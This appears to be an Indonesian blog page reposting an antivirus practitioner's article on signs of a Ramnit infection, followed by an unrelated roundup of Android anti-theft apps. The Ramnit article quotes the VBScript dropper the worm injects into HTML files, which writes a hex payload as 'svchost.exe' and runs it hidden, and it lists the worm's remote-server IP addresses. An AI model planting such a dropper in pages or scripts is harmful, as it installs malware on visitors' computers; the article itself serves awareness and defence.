Ramnit Bikin Rumit, Ini Ciri PC Anda Telah Terinfeksi


http://images.detik.com/content/2013/05/16/323/135814_virus5.jpg

Jakarta - Ramnit sejatinya bukan malware baru, namun karena kemampuan amfibinya, ia masih tetap eksis di jagat program jahat hingga saat ini. Lantas seperti apa ciri-ciri komputer yang terifeksi Ramnit?

-. Muncul pop-up iklan, pornografi atau perjudian
Dalam beberapa waktu tertentu, browser akan membuka pop-up iklan atau pop-up yang berisi konten pornografi atau perjudian (kasino). Hal ini yang terkadang membuat pengguna komputer menjadi tidak nyaman. (lihat gambar 1)



Gambar 1, Pop-up iklan yang dijalankan W32/Ramnit

-. Icon Removable media (USB Flashdisk) berubah menjadi icon folder 


Gambar 2, Icon USB Flash yang diubah W32/Ramnit

-. User tidak dapat mengakses USB Flash dengan menampilkan pesan 'Access is denied'.


Gambar 3, Blok akses USB Flash

-. Muncul pesan 'Compressed (zipped) Folders' pada saat mengakses Flash disk.


Gambar 4, Pesan error saat akses USB Flash

-. Muncul banyak file dengan nama file 'Copy of Shortcut to (1).lnk' sampai dengan 'Copy of Shortcut to (4).lnk' di USB Flash.


Gambar 5, File virus yang di drop oleh virus di USB Flash

-. Salah satu hal yang unik dan membuat virus ini sangat mudah aktif dan sulit dibasmi adalah setiap kali user melakukan klik kanan, selain menampilkan menu klik kanan, secara tidak langsung pengguna komputer juga menjalankan virus ini.

Selain gejala yang kasat mata, Ramnit akan melakukan aksi berbahaya baik yang terlihat maupun tidak terlihat, namun akibatnya sangat terasa dan berbahaya untuk korbannya.

Sebab selain mencuri data dari komputer korban, Ramnit juga melakukan pengunduhan malware lain yang tidak kalah berbahaya seperti Sality, Wapomi, Viking, Renosator, PWSTool, Alman, Kolab dan banyak malware berbahaya lainnya. 

Berikut aksi Ramnit yang terkadang tidak kasat mata namun berbahaya:

>. Muncul script error setelah pop-up iklan
Setelah pop-up iklan yang muncul, maka akan muncul pop-up error atau script error dari browser. Munculnya script error ini mirip seperti virus 'ARP Spoofing' pada tahun 2008. 


Gambar 6, Pop-up error atau script error

>. Injeksi file .exe, .dll
Sama seperti varian malware Sality, Alman dan Virut, W32/Ramnit melakukan injeksi file exe. Hanya saja, W32/Ramnit juga melakukan injeksi terhadap file DLL (dynamic load library). 

File exe dan dll yang diinjeksi akan bertambah sekitar antara 100-120 kb, tergantung varian Ramnit yang menginfeksi. Meskipun begitu, tidak semua file .exe dan .dll di drive C: yang diinjeksi.

>. Injeksi file HTM / HTML
Selain menginjeksi file .exe dan .dll, W32/Ramnit juga melakukan injeksi terhadap file HTM dan HTML. Injeksi dilakukan dengan menambahkan pada header dan footer.

Pada header, W32/Ramnit menambahkan script: DropFileName = 'svchost.exe'


Gambar 7, Script yang ditambahkan pada header file HTML

>. Sedangkan pada footer, W32/Ramnit menambahkan script: 

Set FSO = CreateObject ("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName
If FSO.FileExists(DropPath)=False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step2
Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))
Next
Fileobj.close
End If
Set WSHshell = CreateObject ("Wscript.shell")
WSHshell.Run DropPath, 0


Gambar 8, Script yang ditambahkan pada footer file HTML

>. Membuat fungsi services Windows menjadi blank
Dengan aksi melakukan injeksi file pada file "iexplore.exe" dan file "services.exe", serta menambahkan script pada file web (htm/html) membuat fungsi dari services Windows menjadi blank. 


Gambar 9, Fungsi Services Windows menjadi blank

>. Membuat komputer hang/lambat dan bahkan koneksi jaringan menjadi terputus. Beberapa gejala yang terjadi dan penyebabnya dapat dijelaskan sebagai berikut berdasarkan jenis file yang diinjeksi Ramnit:

C:\WINDOWS\system32\svchost.exe, “svchost.ece” adalah file sistem yang berhubungan dengan koneksi jaringan. Akibatnya jaringan komputer akan terputus ketika file ini di injeksi.
C:\WINDOWS\system32\lsass.exe, “lsass.exe” adalah file sistem yang berhubungan dengan aktivitas komputer. Akibat injeksi ini, sistem komputer akan menjadi lambat / hang.
C:\WINDOWS\system32\services.exe, “services.exe” adalah file sistem yang berhubungan dengan services dan driver yang berjalan. Akibat injeksi ini akan menyebabkan gangguan pada servis dan driver yang di injeksi.
C:\Program Files\Internet Explorer\iexplore.exe, “iexplore.exe” adalah file browser Internet Explorer dari Microsoft. Tujuan injeksi ini adalah agar browser bisa dikontrol untuk melakukan koneksi ke remote server yang telah ditentukan oleh Ramnit sebelumnya.

>. Aktif pada proses memori
Seperti diutarakan di atas, setelah berhasil menguasai Internet Explorer, W32/Ramnit mencoba melakukan koneksi ke Remote Server menggunakan Internet Explorer yang telah di injeksi. Hal ini bisa kita lihat pada proses task manager, walaupun kita tidak sedang membuka IE / Internet Explorer (lihat gambar 10)


Gambar 10, Proses IEXPLORE.EXE (Internet Explorer) yang telah di-injeksi oleh W32/Ramnit

>. Melakukan koneksi ke Remote Server
Malware W32/Ramnit melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Remote Server yang digunakan yaitu di antaranya:
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69

>. Melakukan transfer data ke Remote Server
Selain mencoba melakukan koneksi dan berkomunikasi dengan remote server, W32/Ramnit juga mencoba melakukan transfer data dari komputer korban ke Remote Server dan sebaliknya mengirim file malware ke dalam komputer korban. 


Gambar 11, Transfer data antara komputer korban dengan Remote Server

>. Melakukan broadcast
Sama seperti halnya worm Conficker, W32/Ramnit juga melakukan broadacast pada jaringan. Yang berbeda adalah untuk W32/Ramnit hanya melakukan pada satu alamat yaitu: ADX.ADNXS.COM.


Gambar 12, Broadcast yang dilakukan oleh W32/Ramnit


*) Penulis, Alfons Tanujaya adalah seorang praktisi antivirus dan keamanan internet. Ia bisa dihubungi melalui email info@vaksin.com.
Sumber

Aplikasi Untuk Melacak Android yang Hilang atau diCuri

Jika Anda punya perangkat Android yang hilang atau dicuri, tetap tenang  Kami punya Beberapa aplikasi anti-pencurian  yang dapat membantu Anda menemukan kembali smartphone Anda atau setidaknya menyimpan data pribadi Anda agar aman dari pencurian identitas.
Beberapa aplikasi memiliki fitur yang dapat membantu Anda melacak ponsel Anda yang hilang dengan dengan membuatnya berdering ketika hilang, kirim lokasi GPS ke email Anda atau jika terjadi hal-hal yang tidak diinginkan Anda bisa menghapus data dari smartphone yang hilang dari jarak jauh. Tidak hanya itu aplikasi ini juga bisa mengambil foto pelaku atau merekam audio dengan mikrofon telepon Anda. Ya, aplikasi ini dapat melakukan itu dan banyak lagi.
Tapi ingat bahwa hanya ada beberapa aplikasi yang dapat diinstal setelah ponsel hilang. yang lainya adalah tindakan pencegahan, berarti Anda sudah harus menginstall aplikasi sebelum sesuatu yang buruk terjadi pada perangkat Anda.
Lima Besar : Berikut adalah 5 aplikasi Android yang paling populer untuk melacak perangkat Android yang hilang atau dicuri.

Where’s My Droid [Free]

Where’s My Droid adalah murni aplikasi pencari Telepon, untuk membantu Anda menemukan telepon Anda. Ketika smartphone Anda hilang, anda dapat mengirimkan kode melalui sms yang akan membuat telepon berdering (bahkan ketika diatur dalam modus senyap) sementara dengan kode sms yang lain dapat mengirimkan koordinat GPS dari ponsel.Wheres My Droid1 Aplikasi Untuk Melacak Android yang Hilang atau diCuri
Cara Lainya, Anda dapat mengontrol ponsel Anda dari jarak jauh dengan menghubungkannya ke pilihan Komandan, antarmuka berbasis web. Where’s My Droid juga menawarkan versi Pro yang memungkinkan Anda mengambil gambar dengan kamera (Anda mungkin bisa mengambil snapshot dari pelaku), mengunci atau menghapus  data telepon dari jarak jauh untuk mencegah dari penyalahgunaandata Anda.

Plan B [Free]

Jika sebelumnya, Anda tidak pernah menginstal aplikasi pelacakan di perangkat Android anda dan perangkat anda dicuri atau hilang,maka Plan B akan menjadi penyelamat perangkat anda. Plan B adalah sebuah aplikasi Android dari Lookout Labs yang akanmencari smartphone Anda menggunakan BTS operator dan GPS, kemudian mengirimkan lokasi smartphone Anda ke Inbox Gmail Anda.plan b1 Aplikasi Untuk Melacak Android yang Hilang atau diCuri
Di beberapa smartphone, Plan B dapat mengaktifkan GPS di telepon kemudianmenginformasikan kepada Anda lokasi terbaru setiap 10 menit. Untuk telepon tanpa dukungan tersebut, Anda dapat mengirim sms ‘lokasi’ dari telepon lain, dan rincian lokasi ponsel yang hilang itu akan dikirim ke email Anda. Dan kalau tidak ada sambungan data, perangkat lunak akan mengirimkan lokasinya melalui SMS sebagai gantinya.

Android Lost Free [Free]

Aplikasi ini tidak hanya cocok untuk menemukan telepon Anda yang hilang, Aplikasi ini juga akan menyiksa sang  pencuri (sesuatu yang kami yakin mereka sepenuhnya layak mendapatkanya). Anda dapat mengaktifkan (via SMS atau Web) alarm agar berdering dengan layar berkedip-kedip, mengaktifkan dan menonaktifkan GPS, data dan koneksi Wi-Fi, remote wipe kartu SD, dan mendapatkan daftar panggilan terbaru mereka.Android Lost Free1 Aplikasi Untuk Melacak Android yang Hilang atau diCuri
Meskipun aplikasi gratis, aplikasi ini memungkinkan Anda mengambil gambar dari kamera smartphone (depan dan belakang) dan membuat telepon Anda berbicara menggunakan text-to-speech. Setelah kartu SIM diubah, Anda akan mendapat pemberitahuan melalui email. Aplikasi ini dapat digunakan bahkan setelah Anda telah kehilangan smartphone Anda karena fitur instalasi jarak jauh dan tersembunyi dari launcher untuk mencegah instalasi.

SeekDroid Lite [Free to download; Pro: $2.99/mth]

SeekDroid Lite Ini memiliki semuanya,seperti mengunci dan menghapus jarak jauh, aktivasi SMS, menghidupkan peringatan bahkan dalam mode diam, menyembunyikan tampilan, dan mengaktifkan fitur GPS. Anda juga dapat mengambil log panggilan terakhir – dan bekerja bahkan tanpa kartu SIM terpasang dalam perangkat.seekdroid1 Aplikasi Untuk Melacak Android yang Hilang atau diCuriAccount Pro (berlangganan bulanan) memungkinkan Anda melacak pergerakan smartphone dicuri dengan peta sejarah sehingga Anda tahu di mana perangkat Anda sedang menuju. Anda juga bisa mendapatkan perlindungan untuk beberapa perangkat, dan menerima pemberitahuan ketika ia meninggalkan area-area tertentu (Untuk Memonitor anak anda misalnya).

AntiDroidTheft [Free]

AntiDroidTheft adalah perangkat anti-pencurian sederhana yang memungkinkan Anda menemukan telepon Anda melalui GPS, melacak perubahan yang dibuat ke kartu SIM dan melihat gambar-gambar yang telah diambil oleh smartphone semua melalui Web.antidroidthef1 Aplikasi Untuk Melacak Android yang Hilang atau diCuriItu saja dulu beberapa Aplikasi Untuk Melacak Android yang Hilang atau diCuri sebenarnya masih banyak lagi … 
 

 
Software KU © 2012 | Designed by Cheap TVS, in collaboration with Vegan Breakfast, Royalty Free Images and Live Cricket Score